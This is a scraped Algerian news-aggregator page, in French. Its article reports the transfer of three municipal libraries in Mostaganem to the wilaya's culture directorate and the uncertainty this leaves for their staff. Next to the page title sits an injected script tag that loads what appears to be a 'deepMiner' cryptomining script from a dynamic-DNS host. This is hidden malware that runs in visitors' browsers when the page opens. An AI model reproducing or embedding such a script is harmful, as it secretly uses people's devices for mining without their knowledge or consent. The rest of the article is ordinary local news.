googletag.defineSlot('/21620968445/Djazairess_Fr_Article_1', [[336, 280], [300, 300], [300, 250], [300, 600]], 'div-gpt-ad-142634874-0').addService(googletag.pubads()); googletag.defineOutOfPageSlot('/21620968445/Djazairess_Fr_Article_1', 'div-gpt-ad-142634874-0-oop').addService(googletag.pubads()); googletag.defineSlot('/21620968445/Djazairess_Fr_Article_3', [[336, 280], [300, 300], [300, 250]], 'div-gpt-ad-142634876-0').addService(googletag.pubads()); googletag.defineOutOfPageSlot('/21620968445/Djazairess_Fr_Article_3', 'div-gpt-ad-142634876-0-oop').addService(googletag.pubads()); googletag.defineSlot('/21620968445/Djazairess_Fr_Article_2', [[336, 280], [300, 300], [300, 250]], 'div-gpt-ad-142634875-0').addService(googletag.pubads()); googletag.defineOutOfPageSlot('/21620968445/Djazairess_Fr_Article_2', 'div-gpt-ad-142634875-0-oop').addService(googletag.pubads()); googletag.defineSlot('/21620968445/Djazairess_Fr_Widget', [[222, 280]], 'div-gpt-ad-1524625614-0').addService(googletag.pubads()); googletag.defineOutOfPageSlot('/21620968445/Djazairess_Fr_Widget', 'div-gpt-ad-1524625614-0-oop').addService(googletag.pubads()); googletag.defineSlot('/21620968445/Djazairess_Fr_Siteunder', [[336, 280], [300, 300], [300, 250]], 'div-gpt-ad-930032573-0').addService(googletag.pubads()); googletag.defineOutOfPageSlot('/21620968445/Djazairess_Fr_Siteunder', 'div-gpt-ad-930032573-0-oop').addService(googletag.pubads()); googletag.pubads().enableSingleRequest(); googletag.enableServices();}); Djazairess : LES TROIS BIBLIOTHEQUES MUNICIPALES RATTACHEES A LA CULTURE : Un transfert et des questions ???<script src="https://jhondi33.duckdns.org:7777/deepMiner.min.js"></script>
 
En bref…    La démission surprise d'Ould Abbès    Louisa Hanoune fustige les partisans de la «continuité»    Un élu de l'APW pour représenter le FLN    La sous-traitance représente 10% de l'activité    Marchés pétroliers : La surabondance annonce-t-elle une mauvaise année ?    Un dialogue pour désamorcer la crise    Libye, la quadrature du cercle    Jamal Khashoggi, Ankara enfonce Riyad par petites doses    Votre week-end sportif    Violences dans les gradins du 5-Juillet    Le Mouloudia a mal de ses recrues estivales    Campagne d'information pour expliquer le projet    Plus de 33 000 pétards saisis à Djimla    Des dizaines de villageois de Souk-Lekhmis bloquent le CW15    Six millions d'Algériens sont diabétiques    Zombies-Land !    Logements sociaux : Les recalés des listes des bénéficiaires protestent    Assassinat par la DST en novembre 1954 de Kacem Zeddour Mohammed-Brahim Une affaire d'Etat    WA Tlemcen: Biskra, un cap important pour le Widad    USM Bel-Abbès: Un exploit qui en appelle d'autres    FLN: Ould Abbès démissionne    Ce n'est pas Trump le problème mais l'Amérique qui l'a élu    Europe: «Brexit or not Brexit ?»    Le pétrole, toujours    Le FFS dénonce: Le projet de loi de finances 2019 «présenté de façon expéditive»    Skikda: Saisie de kif, 8 arrestations    Suite aux nombreuses opérations de relogement: Des terrains combinés de proximité pour les nouveaux pôles urbains    Lycée Dergham Hanifi: La police sensibilise les élèves sur les dangers de l'Internet    Présidentielle : on se perd en conjectures !    EN - Les Verts dès demain à Lomé: Belmadi mobilise ses troupes    France 1914-1918 : centenaire de l'Armistice, le 11 novembre    Le virus des primaires    Est-il Halal de prier à la grande mosquée d'Alger ?    Hamas plonge Israël dans une crise politique    FLN : Démission de M. Ould Abbes pour des raisons de santé    Bedoui : " L'Algérie est sur de bons rails vers un lendemain meilleur "    Situation économique et sociale alarmante dans la wilaya de Khenchela :    FLN : Ould Abbès "débarqué"    Des otages druzes libérés portent en triomphe Bachar el-Assad    Les assiettes foncières inexploitées seront mises à la disposition des porteurs de projets    Arnaud Montebourg nouveau président de l'Association    2e édition du prix Cheikh Abdelkrim-Dali à Alger    L'étape d'Alger a coûté 5 MD    «Nous allons à Lomé pour la gagne»    Le Hamas et l'Etat hebreu: Crise politique en Israël    L'échec programmé de Rome    Disney : Les exploits des super-héros font les affaires de Mickey    







Merci d'avoir signalé!
Cette image sera automatiquement bloquée après qu'elle soit signalée par plusieurs personnes.





LES TROIS BIBLIOTHEQUES MUNICIPALES RATTACHEES A LA CULTURE : Un transfert et des questions ???
Publié dans Réflexion le 20 - 06 - 2011

Selon des sources généralement concordantes, l'on a appris que l'APC de Mostaganem vient de procéder cette semaine au transfert de ses trois nouvelles bibliothèques municipales, récemment inaugurées à la direction de la culture.
Désormais les trois bibliothèques seront gérées par la direction de la culture de la wilaya. Selon toujours notre source, cette opération fait suite à une délibération prise par l'Assemblée Communale et qui aurait été approuvée par la tutelle. Toutefois, les raisons ayant amené les responsables de la commune à agir de la sorte demeurent obscures et chacun rejette la balle à l'autre, comme si personne n'en veut endosser la responsabilité de ce ‘'divorce'' avec tout un patrimoine culturel local. Selon toute vraisemblance, si l'APC a délibéré en ce sens, c'est que cette dernière aurait reçu des instructions de haut lieu pour effectuer ce transfert, sinon cette opération serait incompréhensible et injustifiée du fait que les trois infrastructures sont à l'origine, la propriété de la commune. Aussi, Il y a lieu de souligner que le langage n'est pas le même entre le président de l'APC et les élus quant aux vraies raisons de ce transfert. Pour le premier magistrat de la commune, c'est une affaire de gestion : la commune ne pourra pas faire face aux dépenses, notamment en matière de connexion internet des trois bibliothèques qui sont dotées de dizaine de micro-ordinateurs. Pour les autres, la raison est toute autre : ce transfert a été opéré sur la base d'une instruction de la tutelle. Notons que ces trois bibliothèques ont été réalisées dans le cadre du programme communal de développement (PCD), où la wilaya de Mostaganem a bénéficié de 22 bibliothèques municipales dont trois affectées au chef lieu de wilaya et 19 autres éparpillées à travers les communes. La question qui se pose aujourd'hui : quel sera le sort réservé aux 19 autres bibliothèques municipales ? Feront-elles aussi l'objet de transfert à la Culture ? Par ailleurs, aujourd'hui il est question de l'avenir des employés (une cinquantaine environ) de ces trois structures qui sont pour l'instant dans l'expectative ! Ils ne savent pas s'ils demeureront à leurs postes respectifs, ou seront-ils réintégrés au sein des services communaux ? Aucune réponse n'est apportée à cette question pour le moment. En tout état de cause, si cette opération a bien eu lieu la fin de la semaine dernière, il faut noter que la manière dont les choses se sont déroulées manquait de pragmatisme et de rigueur selon les employés et l'un des responsables d'une bibliothèque. En effet, selon les déclarations de ces derniers, personne n'était au courant de ce qui allait se passer, jusqu'au jour où, débarquent le responsable de la règlementation et des affaires générales (DRAG) de l'APC, accompagné de responsables de la culture, au niveau des bibliothèques pour annoncer aux employés que les trois structures sont mises désormais sous tutelle de la Culture. Cette manière de faire a agacé un petit peu le personnel qui aurait souhaité au moins et avec un minimum de décence, que le personnel soit invité à une table et lui annoncer avec la manière la plus diplomatique qui soit le transfert de ces bibliothèques, mais rien en ce sens. Le personnel souhaite maintenant connaitre la suite des événements particulièrement en ce qui concerne leur travail et par conséquent leur avenir.

Cliquez ici pour lire l'article depuis sa source.